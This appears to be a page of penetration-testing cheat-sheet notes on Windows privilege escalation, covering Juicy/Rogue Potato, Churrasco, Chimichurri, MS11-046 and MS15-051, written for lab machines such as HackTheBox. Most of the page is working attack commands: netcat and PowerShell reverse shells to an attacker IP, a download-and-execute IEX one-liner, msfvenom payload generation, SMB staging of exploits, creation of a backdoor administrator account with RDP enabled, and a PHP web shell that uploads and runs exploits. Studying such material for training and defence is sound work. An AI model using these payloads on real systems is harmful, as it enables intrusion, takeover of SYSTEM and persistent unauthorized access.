4 Kernel Exploits

Windows PrivEsc Methods

Family
Versions

Rogue Potato

Latest Version

SHOULD work on Windows 10

Juicy Potato

Upgrade of Rotten

Server 2008 R2 - No Hotfixes Windows 7 Enterprise 6.1.7600

Patched in Latest Win-10

Rotten Potato

Old

Year: 2016

Churrasco

Non-Potato

Chimichurri

Non-Potato : MS10-059

Basics

Required for Potato:

> whoami
Local Service

> whoami /priv
SeImpersonatePrivilege ..Enabled

Token Impersonations

Service Accounts Cant login with them, but can escalate them

Rogue Potato

> RoguePotato.exe -r 10.x.x.x -l 9999 -e "C:\PrivEsc\reverse.exe"
> nc -nvlp 9999

Juicy Potato **BEST**

whoami /priv   ..SeImpersonatePrivilege = JuicyPotato
JuicyPotato.exe -l 5555 -p C:\PrivEsc\reverse.exe -t * -c GUID_CLSID
Juicy.Potato.x86.exe -l 5555 -p "C:\inetpub\wwwroot\shell.exe" -t * -c {F087771F-D74F-4C1A-BB8A-E16ACA9124EA}
JuicyPotato.exe -l 5555 -p c:\Windows\system32\cmd.exe -a "/c C:\intepub\drupal-7.54\nc.exe -e cmd.exe 10.x.x.x 4555" -t *
JuicyPotato.exe -l 5555 -p c:\Windows\system32\cmd.exe -a "/c C:\intepub\drupal-7.54\nc.exe -e cmd.exe 10.x.x.x 4555" -t * -c {9B1F122C-2982-4e91-AA8B-E071D54F2A4D}

nc -nvlp 5555
whoami ..system

Juicy Potato + Powershell

> cp /opt/JuicyPotato.exe jp.exe
> cp /opt/nishang/Shells/Invoke-PowerShellTcp.ps1 revshell.ps1
> vim revshell.ps1
Add this to the end of the file:
Invoke-PowerShellTcp -Reverse -IPAddress $IP -Port 7600

> sudo impacket-smbserver kali .

> copy \\10.10.14.34\kali\jp.exe .
> jp.exe -t * -p C:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -l 9001 -a "-c IEX(new-object net.webclient).downloadstring('http://$IP:9090/revshell.ps1')" -c {9B1F122C-2982-4e91-AA8B-E071D54F2A4D}

> nc -lvnp 7600
> whoami ..system!!

Rotten Potato

Exploit from 2016 Service Accounts could get System tickets and Impersonate

churrasco

  • REF: GrannyHTB GrandpaHTB

  • https://technet.microsoft.com/library/security/ms09-012

  • Token impersonation via churrasco

  • To escalate privs to System - developed by Cesar Cerrudo.

  • Server 2003 allows Network Service and Local Service to impersonate 'System'

  • Patched by Microsoft in Windows 2012 (MS09-12).

  • On newer systems Juicy Potato works fine.

  • But on older systems, token impersonation is abused via the churrasco exploit.

  • If you have access to a box as nt authority\network service

  • IE: You managed to upload ASP.NET shell

  • You can easily elevate your privileges on the box.

  • You can download the exploit here and compile by yourself

  • or you can use the one from sqlninja which is located at /usr/share/sqlninja/apps/churrasco.exe

  • It’s used by sqlninja in cases when we bruteforced sa password.

  • After uploading you can easily

    • Elevate your privileges.

    • Create an Admin account

    ------------------------
Share from Kali/smb:

locate churrasco.exe
wget https://github.com/Re4son/Churrasco/raw/master/churrasco.exe
cp /usr/share/sqlninja/apps/churrasco.exe /tmp
cp /usr/share/sqlninja/apps/nc.exe /tmp
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.98 RPORT=5555 -f exe > /tmp/venomshell.exe

locate smbserver.py
cd /usr/share/doc/python3-impacket/examples/
sudo python3 smbserver.py share /tmp
nc -nvlp 5555


------------------------
Windows:

whoami /priv    ..SeImpersonatePrivilege - Yes!
systeminfo      ..Server 2003 - Yes!

cd C:\Windows\Temp
copy \\10.x.x.x\share\nc.exe .
copy \\10.x.x.x\share\venomshell.exe .
copy \\10.x.x.x\share\churrasco.exe .

> \\10.x.x.x\share\churrasco.exe -d whoami
> churrasco -d "net user /add <username> <password>"
> churrasco -d "net localgroup administrators <username> /add"
> churrasco -d "net localgroup "Remote Desktop Users" <username> /add"
> churrasco.bin "net user oscp oscp /add && net localgroup Administrators oscp /add"
> churrasco -d "'reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server' /v fDenyTSConnections /t REG_DWORD /d 0 /f"
linux> rdesktop -u oscp -p oscp 10.x.x.x

> churrasco.exe -d venomshell.exe
> churrasco.exe -d "C:\Windows\Temp\nc.exe 10.x.x.x 5555 -e cmd.exe"
> \\10.x.x.x\share\churrasco.exe -d "C:\Windows\Temp\nc.exe 10.x.x.x 5555 -e cmd.exe"

chimichurri

  • MS10-059

  • Found with WindowsExploitSuggester

  • Server 2008 R2 Datacenter 6.1.7600 N/A Build 7600 No Patch 64bit

  • github/Re4son ..other blog:

cd /opt
git clone https://github.com/egre55/windows-kernel-exploits
cd windows-kernel-exploits/MS10–059: Chimichurri/Compiled
cp Chimichurri.exe .
pythom -m SimpleHTTPServer 4444

cd C:\ColdFusion8\  or:
cd C:\Windows\Temp
echo $webclient = New-Object System.Net.WebClient >wget.ps1
echo $url = "http://$MyIP:4444/Chimichurri.exe" >>wget.ps1
echo $file = "Chimichurri.exe" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1

powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInterative -NoProfile -File wget.ps1
Chimichurri.exe 10.10.14.xx 5555
nc -nvlp 5555
connected ..system!!

----------
or:

cd /usr/share/doc/python3-impacket/examples
sudo python3 ./smbserver.py share /tmp
nc -nvlp 5555

cd C:\Windows\Temp\
copy \\$MyIP\share\Chimichurri.exe .
Chimichurri.exe $MyIP 5555
system!!

----------
chimichurri.exe $MyIP 5555
nc -nvlp 5555
system!

MS11-046 (AFD PrivEsc)

  • The Ancillary Function Driver (AFD) in afd.sys does not properly validate user-mode input which allows local users to elevate privileges.

  • ms11-046.exe 6.1.7600 Build 7600 - for 32bit only

  • https://www.exploit-db.com/exploits/40564/

https://github.com/abatchy17/WindowsExploits
https://github.com/abatchy17/WindowsExploits/blob/5e9c25cda54fe33fb6e1fd3ae60512a1113b41df/MS11-046/MS11-046.exe

smbserver.py share
\\10.10.14.34\share\MS11-046.exe
whoami ..system!

https://github.com/rasta-mouse/Watson

or
Download from:
https://www.exploit-db.com/exploits/40564

Compile:
apt install mingw-w64  ..if not installed
i686-w64-mingw32-gcc 40564.c -o 40564.exe -lws2_32

python -m SimpleHTTPServer 8080
wget and curl are not installed on the machine however powershell is.
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.x.x.x:8080/40564.exe', 'c:\Users\Public\Downloads\40564.exe')"
whoami ..system!

MS15-051

MS15-051 privesc
github/hfiref0x ..compiled Taihou64.exe (firefox thought virus)
github/SecWiki ..MS15-051 ..compiled ..zipped ..download

cp ms15-051x64.exe .
http://10.x.x.x/ippsec.php?fupload=ms15-051x64.exe&fexec=ms15-051x64.exe whoami
system!

http://10.x.x.x/ippsec.php?fupload=ms15-051x64.exe&fexec=ms15-051x64.exe "nc64.exe -e 10.x.x.x 5555"
nc -nvlp 5555
system!

Bonus PrivEsc:
ms15–051x64.exe whoami   ..easy

Send and Execute

impacket-smbserver share `myfolder`
http://10.x.x.x/ippsec.php?fexe=\\10.x.x.x\share\privesc.exe whoami
Previous3 PrivEscNext5 Looting

Last updated